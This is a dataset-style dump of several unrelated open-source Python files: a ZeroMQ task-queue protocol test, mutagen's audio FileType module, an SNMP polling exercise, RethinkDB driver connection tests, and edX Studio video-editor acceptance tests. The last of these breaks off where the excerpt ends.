code
stringlengths 2
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int32 2
1.05M
|
---|---|---|---|---|---|
#!/usr/bin/python
import zmq
import sys, os
def main():
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect(os.environ["QP_RUN_ADDRESS"])
def send(msg,expected):
print "Send : ", msg
socket.send(msg)
reply = socket.recv()
print "Reply : ", ':'+reply+':'
if (reply != expected):
print "Expected: ", ':'+expected+':'
print ""
assert (reply == expected)
send("new_job ao_integrals tcp://130.120.229.139:12345 inproc://ao_integrals",
"ok")
send("new_job ao_integrals tcp://130.120.229.139:12345 inproc://ao_integrals",
"error A job is already running")
# send("connect","error Message not understood : connect")
send("connect tcp","connect_reply ao_integrals 1 tcp://130.120.229.139:12345")
send("connect inproc","connect_reply ao_integrals 2 inproc://ao_integrals")
send("disconnect ao_integrals 3","error Queuing_system.ml:68:2 : disconnect ao_integrals 3")
send("disconnect ao_integrals 2","disconnect_reply ao_integrals")
send("connect inproc","connect_reply ao_integrals 3 inproc://ao_integrals")
send("add_task ao_integrals triangle 3", "ok")
send("add_task ao_integrals range 4 7", "ok")
for i in range(8,11):
send("add_task ao_integrals %d %d"%(i,i+10), "ok")
send("get_task ao_integrals 3", "get_task_reply 10 10 20")
send("get_task ao_integrals 3", "get_task_reply 9 9 19")
send("get_task ao_integrals 3", "get_task_reply 8 8 18")
send("task_done ao_integrals 3 10", "ok")
send("task_done ao_integrals 3 9", "ok")
send("task_done ao_integrals 3 8", "ok")
send("del_task ao_integrals 10", "del_task_reply more 10")
send("del_task ao_integrals 9", "del_task_reply more 9")
send("del_task ao_integrals 8", "del_task_reply more 8")
send("del_task ao_integrals 10", "error Task 10 is already deleted : del_task ao_integrals 10")
send("get_task ao_integrals 1", "get_task_reply 7 4")
send("get_task ao_integrals 3", "get_task_reply 6 5")
send("get_task ao_integrals 1", "get_task_reply 5 6")
send("get_task ao_integrals 3", "get_task_reply 4 7")
send("get_task ao_integrals 3", "get_task_reply 3 1 3")
send("get_task ao_integrals 1", "get_task_reply 2 2 3")
send("get_task ao_integrals 1", "get_task_reply 1 3 3")
send("task_done ao_integrals 1 1", "ok")
send("task_done ao_integrals 1 2", "ok")
send("task_done ao_integrals 3 3", "ok")
send("task_done ao_integrals 3 4", "ok")
send("task_done ao_integrals 1 5", "ok")
send("task_done ao_integrals 1 6", "error Queuing_system.ml:81:30 : task_done ao_integrals 1 6")
send("task_done ao_integrals 3 6", "ok")
send("task_done ao_integrals 1 7", "ok")
send("del_task ao_integrals 1", "del_task_reply more 1")
send("del_task ao_integrals 2", "del_task_reply more 2")
send("del_task ao_integrals 3", "del_task_reply more 3")
send("del_task ao_integrals 4", "del_task_reply more 4")
send("del_task ao_integrals 5", "del_task_reply more 5")
send("del_task ao_integrals 6", "del_task_reply more 6")
send("del_task ao_integrals 7", "del_task_reply done 7")
send("end_job ao_integrals","ok")
send("end_job ao_integrals","error No job is running")
send("terminate","ok")
if __name__ == '__main__':
main()
| TApplencourt/quantum_package | ocaml/tests/test_task_server.py | Python | gpl-3.0 | 3,246 |
# Copyright (C) 2005 Michael Urman
# -*- coding: utf-8 -*-
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
import warnings
from mutagen._util import DictMixin
from mutagen._compat import izip
class FileType(DictMixin):
"""An abstract object wrapping tags and audio stream information.
Attributes:
* info -- :class:`StreamInfo` -- (length, bitrate, sample rate)
* tags -- :class:`Tags` -- metadata tags, if any
Each file format has different potential tags and stream
information.
FileTypes implement an interface very similar to Metadata; the
dict interface, save, load, and delete calls on a FileType call
the appropriate methods on its tag data.
"""
__module__ = "mutagen"
info = None
tags = None
filename = None
_mimes = ["application/octet-stream"]
def __init__(self, filename=None, *args, **kwargs):
if filename is None:
warnings.warn("FileType constructor requires a filename",
DeprecationWarning)
else:
self.load(filename, *args, **kwargs)
def load(self, filename, *args, **kwargs):
raise NotImplementedError
def __getitem__(self, key):
"""Look up a metadata tag key.
If the file has no tags at all, a KeyError is raised.
"""
if self.tags is None:
raise KeyError(key)
else:
return self.tags[key]
def __setitem__(self, key, value):
"""Set a metadata tag.
If the file has no tags, an appropriate format is added (but
not written until save is called).
"""
if self.tags is None:
self.add_tags()
self.tags[key] = value
def __delitem__(self, key):
"""Delete a metadata tag key.
If the file has no tags at all, a KeyError is raised.
"""
if self.tags is None:
raise KeyError(key)
else:
del(self.tags[key])
def keys(self):
"""Return a list of keys in the metadata tag.
If the file has no tags at all, an empty list is returned.
"""
if self.tags is None:
return []
else:
return self.tags.keys()
def delete(self, filename=None):
"""Remove tags from a file.
In cases where the tagging format is independent of the file type
(for example `mutagen.ID3`) all traces of the tagging format will
be removed.
In cases where the tag is part of the file type, all tags and
padding will be removed.
The tags attribute will be cleared as well if there is one.
Does nothing if the file has no tags.
:raises mutagen.MutagenError: if deleting wasn't possible
"""
if self.tags is not None:
if filename is None:
filename = self.filename
else:
warnings.warn(
"delete(filename=...) is deprecated, reload the file",
DeprecationWarning)
return self.tags.delete(filename)
def save(self, filename=None, **kwargs):
"""Save metadata tags.
:raises mutagen.MutagenError: if saving wasn't possible
"""
if filename is None:
filename = self.filename
else:
warnings.warn(
"save(filename=...) is deprecated, reload the file",
DeprecationWarning)
if self.tags is not None:
return self.tags.save(filename, **kwargs)
def pprint(self):
"""Print stream information and comment key=value pairs."""
stream = "%s (%s)" % (self.info.pprint(), self.mime[0])
try:
tags = self.tags.pprint()
except AttributeError:
return stream
else:
return stream + ((tags and "\n" + tags) or "")
def add_tags(self):
"""Adds new tags to the file.
:raises mutagen.MutagenError: if tags already exist or adding is not
possible.
"""
raise NotImplementedError
@property
def mime(self):
"""A list of mime types"""
mimes = []
for Kind in type(self).__mro__:
for mime in getattr(Kind, '_mimes', []):
if mime not in mimes:
mimes.append(mime)
return mimes
@staticmethod
def score(filename, fileobj, header):
raise NotImplementedError
class StreamInfo(object):
"""Abstract stream information object.
Provides attributes for length, bitrate, sample rate etc.
See the implementations for details.
"""
__module__ = "mutagen"
def pprint(self):
"""Print stream information"""
raise NotImplementedError
def File(filename, options=None, easy=False):
"""Guess the type of the file and try to open it.
The file type is decided by several things, such as the first 128
bytes (which usually contains a file type identifier), the
filename extension, and the presence of existing tags.
If no appropriate type could be found, None is returned.
:param options: Sequence of :class:`FileType` implementations, defaults to
all included ones.
:param easy: If the easy wrappers should be returnd if available.
For example :class:`EasyMP3 <mp3.EasyMP3>` instead
of :class:`MP3 <mp3.MP3>`.
"""
if options is None:
from mutagen.asf import ASF
from mutagen.apev2 import APEv2File
from mutagen.flac import FLAC
if easy:
from mutagen.easyid3 import EasyID3FileType as ID3FileType
else:
from mutagen.id3 import ID3FileType
if easy:
from mutagen.mp3 import EasyMP3 as MP3
else:
from mutagen.mp3 import MP3
from mutagen.oggflac import OggFLAC
from mutagen.oggspeex import OggSpeex
from mutagen.oggtheora import OggTheora
from mutagen.oggvorbis import OggVorbis
from mutagen.oggopus import OggOpus
if easy:
from mutagen.trueaudio import EasyTrueAudio as TrueAudio
else:
from mutagen.trueaudio import TrueAudio
from mutagen.wavpack import WavPack
if easy:
from mutagen.easymp4 import EasyMP4 as MP4
else:
from mutagen.mp4 import MP4
from mutagen.musepack import Musepack
from mutagen.monkeysaudio import MonkeysAudio
from mutagen.optimfrog import OptimFROG
from mutagen.aiff import AIFF
from mutagen.aac import AAC
from mutagen.smf import SMF
options = [MP3, TrueAudio, OggTheora, OggSpeex, OggVorbis, OggFLAC,
FLAC, AIFF, APEv2File, MP4, ID3FileType, WavPack,
Musepack, MonkeysAudio, OptimFROG, ASF, OggOpus, AAC,
SMF]
if not options:
return None
with open(filename, "rb") as fileobj:
header = fileobj.read(128)
# Sort by name after score. Otherwise import order affects
# Kind sort order, which affects treatment of things with
# equals scores.
results = [(Kind.score(filename, fileobj, header), Kind.__name__)
for Kind in options]
results = list(izip(results, options))
results.sort()
(score, name), Kind = results[-1]
if score > 0:
return Kind(filename)
else:
return None
| bbsan2k/nzbToMedia | libs/mutagen/_file.py | Python | gpl-3.0 | 7,621 |
#!/usr/bin/env python
'''
Applied Python Course, Class1, Exercise 2c
Note, you will need to update the IP and COMMUNITY_STRING to use this script.
'''
import snmp_helper
COMMUNITY_STRING = '********'
ip_addr = '10.10.10.10'
pynet_rtr1 = (ip_addr, COMMUNITY_STRING, 7961)
pynet_rtr2 = (ip_addr, COMMUNITY_STRING, 8061)
SYS_DESCR = '1.3.6.1.2.1.1.1.0'
SYS_NAME = '1.3.6.1.2.1.1.5.0'
for a_device in (pynet_rtr1, pynet_rtr2):
print "\n*********************"
for the_oid in (SYS_NAME, SYS_DESCR):
snmp_data = snmp_helper.snmp_get_oid(a_device, oid=the_oid)
output = snmp_helper.snmp_extract(snmp_data)
print output
print "*********************"
print
| Collisio-Adolebitque/pfne-2017 | pynet/appliedpy_ecourse/class1/ex2_simple_snmp.py | Python | gpl-3.0 | 694 |
#!/usr/bin/env python
##
# Tests the driver API for making connections and excercizes the networking code
###
from __future__ import print_function
import datetime, os, random, re, socket, sys, tempfile, threading, time, traceback, unittest
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir, "common"))
import driver, utils
try:
xrange
except NameError:
xrange = range
try:
import SocketServer
except:
import socketserver as SocketServer
# -- import the rethinkdb driver
r = utils.import_python_driver()
# -- get settings
DEFAULT_DRIVER_PORT = 28015
rethinkdb_exe = sys.argv[1] if len(sys.argv) > 1 else utils.find_rethinkdb_executable()
use_default_port = bool(int(sys.argv[2])) if len(sys.argv) > 2 else 0
# -- shared server
sharedServer = None
sharedServerOutput = None
sharedServerHost = None
sharedServerDriverPort = None
if 'RDB_DRIVER_PORT' in os.environ:
sharedServerDriverPort = int(os.environ['RDB_DRIVER_PORT'])
if 'RDB_SERVER_HOST' in os.environ:
sharedServerHost = os.environ['RDB_SERVER_HOST']
else:
sharedServerHost = 'localhost'
def checkSharedServer():
if sharedServerDriverPort is not None:
conn = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 'test' not in r.db_list().run(conn):
r.db_create('test').run(conn)
def closeSharedServer():
global sharedServer, sharedServerOutput, sharedServerHost, sharedServerDriverPort
if sharedServer is not None:
try:
sharedServer.close()
except Exception as e:
sys.stderr.write('Got error while shutting down server: %s' % str(e))
sharedServer = None
sharedServerOutput = None
sharedServerHost = None
sharedServerDriverPort = None
# == Test Base Classes
class TestCaseCompatible(unittest.TestCase):
'''Compatibility shim for Python 2.6'''
def __init__(self, *args, **kwargs):
super(TestCaseCompatible, self).__init__(*args, **kwargs)
if not hasattr(self, 'assertRaisesRegexp'):
self.assertRaisesRegexp = self.replacement_assertRaisesRegexp
if not hasattr(self, 'skipTest'):
self.skipTest = self.replacement_skipTest
if not hasattr(self, 'assertGreaterEqual'):
self.assertGreaterEqual = self.replacement_assertGreaterEqual
if not hasattr(self, 'assertLess'):
self.assertLess = self.replacement_assertLess
def replacement_assertGreaterEqual(self, greater, lesser):
if not greater >= lesser:
raise AssertionError('%s not greater than or equal to %s' % (greater, lesser))
def replacement_assertLess(self, lesser, greater):
if not greater > lesser:
raise AssertionError('%s not less than %s' % (lesser, greater))
def replacement_skipTest(self, message):
sys.stderr.write("%s " % message)
def replacement_assertRaisesRegexp(self, exception, regexp, callable_func, *args, **kwds):
try:
callable_func(*args, **kwds)
except Exception as e:
self.assertTrue(isinstance(e, exception), '%s expected to raise %s but instead raised %s: %s\n%s' % (repr(callable_func), repr(exception), e.__class__.__name__, str(e), traceback.format_exc()))
self.assertTrue(re.search(regexp, str(e)), '%s did not raise the expected message "%s", but rather: %s' % (repr(callable_func), str(regexp), str(e)))
else:
self.fail('%s failed to raise a %s' % (repr(callable_func), repr(exception)))
class TestWithConnection(TestCaseCompatible):
port = None
server = None
serverOutput = None
def setUp(self):
global sharedServer, sharedServerOutput, sharedServerHost, sharedServerDriverPort
if sharedServer is not None:
try:
sharedServer.check()
except Exception:
# ToDo: figure out how to blame the last test
closeSharedServer()
if sharedServerDriverPort is None:
sharedServerOutput = tempfile.NamedTemporaryFile('w+')
sharedServer = driver.Process(executable_path=rethinkdb_exe, console_output=sharedServerOutput, wait_until_ready=True)
sharedServerHost = sharedServer.host
sharedServerDriverPort = sharedServer.driver_port
# - insure we are ready
checkSharedServer()
def tearDown(self):
global sharedServer, sharedServerOutput, sharedServerHost, sharedServerDriverPort
if sharedServerDriverPort is not None:
try:
checkSharedServer()
except Exception:
closeSharedServer()
raise # ToDo: figure out how to best give the server log
# == Test Classes
class TestNoConnection(TestCaseCompatible):
# No servers started yet so this should fail
def test_connect(self):
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
self.assertRaisesRegexp(r.RqlDriverError, "Could not connect to localhost:%d." % DEFAULT_DRIVER_PORT, r.connect)
def test_connect_port(self):
port = utils.get_avalible_port()
self.assertRaisesRegexp(r.RqlDriverError, "Could not connect to localhost:%d." % port, r.connect, port=port)
def test_connect_host(self):
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
self.assertRaisesRegexp(
r.RqlDriverError, "Could not connect to 0.0.0.0:%d." % DEFAULT_DRIVER_PORT, r.connect, host="0.0.0.0")
def test_connect_timeout(self):
'''Test that we get a ReQL error if we connect to a non-responsive port'''
useSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
useSocket.bind(('localhost', 0))
useSocket.listen(0)
host, port = useSocket.getsockname()
try:
self.assertRaisesRegexp(r.RqlDriverError,
"Could not connect to %s:%d. Error: Operation timed out." % (host, port),
r.connect, host=host, port=port, timeout=2)
finally:
useSocket.close()
def test_connect_host(self):
port = utils.get_avalible_port()
self.assertRaisesRegexp(r.RqlDriverError, "Could not connect to 0.0.0.0:%d." % port, r.connect, host="0.0.0.0", port=port)
def test_empty_run(self):
# Test the error message when we pass nothing to run and didn't call `repl`
self.assertRaisesRegexp(r.RqlDriverError, "RqlQuery.run must be given a connection to run on.", r.expr(1).run)
def test_auth_key(self):
# Test that everything still doesn't work even with an auth key
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
self.assertRaisesRegexp(r.RqlDriverError, 'Could not connect to 0.0.0.0:%d."' % DEFAULT_DRIVER_PORT, r.connect, host="0.0.0.0", port=DEFAULT_DRIVER_PORT, auth_key="hunter2")
class TestPrivateServer(TestCaseCompatible):
server = None
serverConsoleOutput = None
useDefaultPort = False
port = None
authKey = None
@classmethod
def setUp(cls):
if cls.server is not None:
try:
cls.server.check()
except Exception:
cls.server = None
if cls.server is None:
port = str(DEFAULT_DRIVER_PORT) if cls.useDefaultPort else '0'
cls.serverConsoleOutput = tempfile.NamedTemporaryFile('w+')
cls.server = driver.Process(executable_path=rethinkdb_exe, console_output=cls.serverConsoleOutput, wait_until_ready=True, extra_options=['--driver-port', port])
cls.port = cls.server.driver_port
if cls.authKey is not None:
conn = r.connect(host=cls.server.host, port=cls.server.driver_port)
result = r.db('rethinkdb').table('cluster_config').update({'auth_key':cls.authKey}).run(conn)
if result != {'skipped': 0, 'deleted': 0, 'unchanged': 0, 'errors': 0, 'replaced': 1, 'inserted': 0}:
raise Exception('Unable to set authkey, got: %s' % str(result))
@classmethod
def tearDown(cls):
if cls.server is not None:
try:
cls.server.check()
except Exception as e:
try:
cls.server.close()
except Exception:
pass
cls.server = None
raise
class TestConnectionDefaultPort(TestPrivateServer):
useDefaultPort = True
def setUp(self):
if not use_default_port:
self.skipTest("Not testing default port")
return # in case we fell back on replacement_skip
super(TestConnectionDefaultPort, self).setUp()
def test_connect(self):
if not use_default_port:
return
conn = r.connect()
conn.reconnect()
def test_connect_host(self):
if not use_default_port:
return
conn = r.connect(host='localhost')
conn.reconnect()
def test_connect_host_port(self):
if not use_default_port:
return
conn = r.connect(host='localhost', port=DEFAULT_DRIVER_PORT)
conn.reconnect()
def test_connect_port(self):
if not use_default_port:
return
conn = r.connect(port=DEFAULT_DRIVER_PORT)
conn.reconnect()
def test_connect_wrong_auth(self):
if not use_default_port:
return
self.assertRaisesRegexp(
r.RqlDriverError, "Server dropped connection with message: \"ERROR: Incorrect authorization key.\"",
r.connect, auth_key="hunter2")
class TestAuthConnection(TestPrivateServer):
incorrectAuthMessage = 'Server dropped connection with message: "ERROR: Incorrect authorization key."'
authKey = 'hunter2'
def test_connect_no_auth(self):
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port)
def test_connect_wrong_auth(self):
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key="")
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key="hunter3")
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key="hunter22")
def test_connect_long_auth(self):
long_key = str("k") * 2049
not_long_key = str("k") * 2048
self.assertRaisesRegexp(
r.RqlDriverError, "Server dropped connection with message: \"ERROR: Client provided an authorization key that is too long.\"",
r.connect, port=self.port, auth_key=long_key)
self.assertRaisesRegexp(r.RqlDriverError, self.incorrectAuthMessage, r.connect, port=self.port, auth_key=not_long_key)
def test_connect_correct_auth(self):
conn = r.connect(port=self.port, auth_key="hunter2")
conn.reconnect()
class TestConnection(TestWithConnection):
def test_connect_close_reconnect(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.expr(1).run(c)
c.close()
c.close()
c.reconnect()
r.expr(1).run(c)
def test_connect_close_expr(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.expr(1).run(c)
c.close()
self.assertRaisesRegexp(
r.RqlDriverError, "Connection is closed.",
r.expr(1).run, c)
def test_noreply_wait_waits(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.noreply_wait()
duration = time.time() - t
self.assertGreaterEqual(duration, 0.5)
def test_close_waits_by_default(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.close()
duration = time.time() - t
self.assertGreaterEqual(duration, 0.5)
def test_reconnect_waits_by_default(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.reconnect()
duration = time.time() - t
self.assertGreaterEqual(duration, 0.5)
def test_close_does_not_wait_if_requested(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.close(noreply_wait=False)
duration = time.time() - t
self.assertLess(duration, 0.5)
def test_reconnect_does_not_wait_if_requested(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
t = time.time()
r.js('while(true);', timeout=0.5).run(c, noreply=True)
c.reconnect(noreply_wait=False)
duration = time.time() - t
self.assertLess(duration, 0.5)
def test_db(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
if 'db2' in r.db_list().run(c):
r.db_drop('db2').run(c)
r.db_create('db2').run(c)
if 't2' in r.db('db2').table_list().run(c):
r.db('db2').table_drop('t2').run(c)
r.db('db2').table_create('t2').run(c)
# Default db should be 'test' so this will work
r.table('t1').run(c)
# Use a new database
c.use('db2')
r.table('t2').run(c)
self.assertRaisesRegexp(r.RqlRuntimeError, "Table `db2.t1` does not exist.", r.table('t1').run, c)
c.use('test')
r.table('t1').run(c)
self.assertRaisesRegexp( r.RqlRuntimeError, "Table `test.t2` does not exist.", r.table('t2').run, c)
c.close()
# Test setting the db in connect
c = r.connect(db='db2', host=sharedServerHost, port=sharedServerDriverPort)
r.table('t2').run(c)
self.assertRaisesRegexp(r.RqlRuntimeError, "Table `db2.t1` does not exist.", r.table('t1').run, c)
c.close()
# Test setting the db as a `run` option
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.table('t2').run(c, db='db2')
def test_use_outdated(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
# Use outdated is an option that can be passed to db.table or `run`
# We're just testing here if the server actually accepts the option.
r.table('t1', use_outdated=True).run(c)
r.table('t1').run(c, use_outdated=True)
def test_repl(self):
# Calling .repl() should set this connection as global state
# to be used when `run` is not otherwise passed a connection.
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort).repl()
r.expr(1).run()
c.repl() # is idempotent
r.expr(1).run()
c.close()
self.assertRaisesRegexp(r.RqlDriverError, "Connection is closed", r.expr(1).run)
def test_port_conversion(self):
c = r.connect(host=sharedServerHost, port=str(sharedServerDriverPort))
r.expr(1).run(c)
c.close()
self.assertRaisesRegexp(r.RqlDriverError, "Could not convert port abc to an integer.", r.connect, port='abc', host=sharedServerHost)
class TestShutdown(TestWithConnection):
def setUp(self):
if sharedServer is None:
closeSharedServer() # we need to be able to kill the server, so can't use one from outside
super(TestShutdown, self).setUp()
def test_shutdown(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
r.expr(1).run(c)
closeSharedServer()
time.sleep(0.2)
self.assertRaisesRegexp(r.RqlDriverError, "Connection is closed.", r.expr(1).run, c)
# This doesn't really have anything to do with connections but it'll go
# in here for the time being.
class TestPrinting(TestCaseCompatible):
# Just test that RQL queries support __str__ using the pretty printer.
# An exhaustive test of the pretty printer would be, well, exhausting.
def runTest(self):
self.assertEqual(str(r.db('db1').table('tbl1').map(lambda x: x)),
"r.db('db1').table('tbl1').map(lambda var_1: var_1)")
# Another non-connection connection test. It's to test that get_intersecting()
# batching works properly.
class TestGetIntersectingBatching(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
t1 = r.db('test').table('t1')
t1.index_create('geo', geo=True).run(c)
t1.index_wait('geo').run(c)
batch_size = 3
point_count = 500
poly_count = 500
get_tries = 10
# Insert a couple of random points, so we get a well distributed range of
# secondary keys. Also insert a couple of large-ish polygons, so we can
# test filtering of duplicates on the server.
rseed = random.getrandbits(64)
random.seed(rseed)
print("Random seed: " + str(rseed), end=' ')
sys.stdout.flush()
points = []
for i in xrange(0, point_count):
points.append({'geo':r.point(random.uniform(-180.0, 180.0), random.uniform(-90.0, 90.0))})
polygons = []
for i in xrange(0, poly_count):
# A fairly big circle, so it will cover a large range in the secondary index
polygons.append({'geo':r.circle([random.uniform(-180.0, 180.0), random.uniform(-90.0, 90.0)], 1000000)})
t1.insert(points).run(c)
t1.insert(polygons).run(c)
# Check that the results are actually lazy at least some of the time
# While the test is randomized, chances are extremely high to get a lazy result at least once.
seen_lazy = False
for i in xrange(0, get_tries):
query_circle = r.circle([random.uniform(-180.0, 180.0), random.uniform(-90.0, 90.0)], 8000000);
reference = t1.filter(r.row['geo'].intersects(query_circle)).coerce_to("ARRAY").run(c)
cursor = t1.get_intersecting(query_circle, index='geo').run(c, max_batch_rows=batch_size)
if cursor.error is None:
seen_lazy = True
itr = iter(cursor)
while len(reference) > 0:
row = next(itr)
self.assertEqual(reference.count(row), 1)
reference.remove(row)
self.assertRaises(r.RqlCursorEmpty, lambda: next(itr))
self.assertTrue(seen_lazy)
r.db('test').table_drop('t1').run(c)
class TestBatching(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
# Test the cursor API when there is exactly mod batch size elements in the result stream
if 't1' in r.db('test').table_list().run(c):
r.db('test').table_drop('t1').run(c)
r.db('test').table_create('t1').run(c)
t1 = r.table('t1')
batch_size = 3
count = 500
ids = set(xrange(0, count))
t1.insert([{'id':i} for i in ids]).run(c)
cursor = t1.run(c, max_batch_rows=batch_size)
itr = iter(cursor)
for i in xrange(0, count - 1):
row = next(itr)
ids.remove(row['id'])
self.assertEqual(next(itr)['id'], ids.pop())
self.assertRaises(r.RqlCursorEmpty, lambda: next(itr))
r.db('test').table_drop('t1').run(c)
class TestGroupWithTimeKey(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
if 'times' in r.db('test').table_list().run(c):
r.db('test').table_drop('times').run(c)
r.db('test').table_create('times').run(c)
time1 = 1375115782.24
rt1 = r.epoch_time(time1).in_timezone('+00:00')
dt1 = datetime.datetime.fromtimestamp(time1, r.ast.RqlTzinfo('+00:00'))
time2 = 1375147296.68
rt2 = r.epoch_time(time2).in_timezone('+00:00')
dt2 = datetime.datetime.fromtimestamp(time2, r.ast.RqlTzinfo('+00:00'))
res = r.table('times').insert({'id':0, 'time':rt1}).run(c)
self.assertEqual(res['inserted'], 1)
res = r.table('times').insert({'id':1, 'time':rt2}).run(c)
self.assertEqual(res['inserted'], 1)
expected_row1 = {'id':0, 'time':dt1}
expected_row2 = {'id':1, 'time':dt2}
groups = r.table('times').group('time').coerce_to('array').run(c)
self.assertEqual(groups, {dt1:[expected_row1], dt2:[expected_row2]})
class TestSuccessAtomFeed(TestWithConnection):
def runTest(self):
c = r.connect(host=sharedServerHost, port=sharedServerDriverPort)
from rethinkdb import ql2_pb2 as p
if 'success_atom_feed' in r.db('test').table_list().run(c):
r.db('test').table_drop('success_atom_feed').run(c)
r.db('test').table_create('success_atom_feed').run(c)
t1 = r.db('test').table('success_atom_feed')
res = t1.insert({'id': 0, 'a': 16}).run(c)
self.assertEqual(res['inserted'], 1)
res = t1.insert({'id': 1, 'a': 31}).run(c)
self.assertEqual(res['inserted'], 1)
t1.index_create('a', lambda x: x['a']).run(c)
t1.index_wait('a').run(c)
changes = t1.get(0).changes().run(c)
self.assertTrue(changes.error is None)
self.assertEqual(len(changes.items), 1)
if __name__ == '__main__':
print("Running py connection tests")
suite = unittest.TestSuite()
loader = unittest.TestLoader()
suite.addTest(loader.loadTestsFromTestCase(TestNoConnection))
if use_default_port:
suite.addTest(loader.loadTestsFromTestCase(TestConnectionDefaultPort))
suite.addTest(loader.loadTestsFromTestCase(TestAuthConnection))
suite.addTest(loader.loadTestsFromTestCase(TestConnection))
suite.addTest(TestPrinting())
suite.addTest(TestBatching())
suite.addTest(TestGetIntersectingBatching())
suite.addTest(TestGroupWithTimeKey())
suite.addTest(TestSuccessAtomFeed())
suite.addTest(loader.loadTestsFromTestCase(TestShutdown))
res = unittest.TextTestRunner(verbosity=2).run(suite)
serverClosedCleanly = True
try:
if sharedServer is not None:
sharedServer.check_and_stop()
except Exception as e:
serverClosedCleanly = False
sys.stderr.write('The server did not close cleanly after testing: %s' % str(e))
if not res.wasSuccessful() or not serverClosedCleanly:
sys.exit(1)
| urandu/rethinkdb | test/rql_test/connections/connection.py | Python | agpl-3.0 | 23,434 |
# -*- coding: utf-8 -*-
"""
Acceptance tests for CMS Video Editor.
"""
import ddt
from common.test.acceptance.pages.common.utils import confirm_prompt
from common.test.acceptance.tests.video.test_studio_video_module import CMSVideoBaseTest
@ddt.ddt
class VideoEditorTest(CMSVideoBaseTest):
"""
CMS Video Editor Test Class
"""
shard = 6
def _create_video_component(self, subtitles=False):
"""
Create a video component and navigate to unit page
Arguments:
subtitles (bool): Upload subtitles or not
"""
if subtitles:
self.assets.append('subs_3_yD_cEKoCk.srt.sjson')
self.navigate_to_course_unit()
def test_default_settings(self):
"""
Scenario: User can view Video metadata
Given I have created a Video component
And I edit the component
Then I see the correct video settings and default values
"""
self._create_video_component()
self.edit_component()
self.assertTrue(self.video.verify_settings())
def test_modify_video_display_name(self):
"""
Scenario: User can modify Video display name
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
Then I can modify video display name
And my video display name change is persisted on save
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Component Display Name', 'Transformers')
self.save_unit_settings()
self.edit_component()
self.open_advanced_tab()
self.assertTrue(self.video.verify_field_value('Component Display Name', 'Transformers'))
def test_hidden_captions(self):
"""
Scenario: Captions are hidden when "transcript display" is false
Given I have created a Video component with subtitles
And I have set "transcript display" to False
Then when I view the video it does not show the captions
"""
self._create_video_component(subtitles=True)
# Prevent cookies from overriding course settings
self.browser.delete_cookie('hide_captions')
self.edit_component()
self.open_advanced_tab()
self.video.set_field_value('Show Transcript', 'False', 'select')
self.save_unit_settings()
self.assertFalse(self.video.is_captions_visible())
def test_translations_uploading(self):
"""
Scenario: Translations uploading works correctly
Given I have created a Video component
And I edit the component
And I open tab "Advanced"
And I upload transcript file "chinese_transcripts.srt" for "zh" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And I edit the component
And I open tab "Advanced"
And I see translations for "zh"
And I upload transcript file "uk_transcripts.srt" for "uk" language code
And I save changes
Then when I view the video it does show the captions
And I see "好 各位同学" text in the captions
And video language menu has "uk, zh" translations
"""
self._create_video_component()
self.edit_component()
self.open_advanced_tab()
self.video.upload_translation('chinese_transcripts.srt', 'zh')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
unicode_text = u"好 各位同学"
self.assertIn(unicode_text, self.video.captions_text)
self.edit_component()
self.open_advanced_tab()
self.assertEqual(self.video.translations(), ['zh'])
self.video.upload_translation('uk_transcripts.srt', 'uk')
self.save_unit_settings()
self.assertTrue(self.video.is_captions_visible())
self.assertIn(unicode_text, self.video.captions_text)
self.assertEqual(set(self.video.caption_languages.keys()), {'zh', 'uk'})
def test_save_language_upload_no_transcript(self):
"""
Scenario: Transcript language is not shown in language menu if no transcript file is uploaded
Given I have created a Video component
And I edit the component
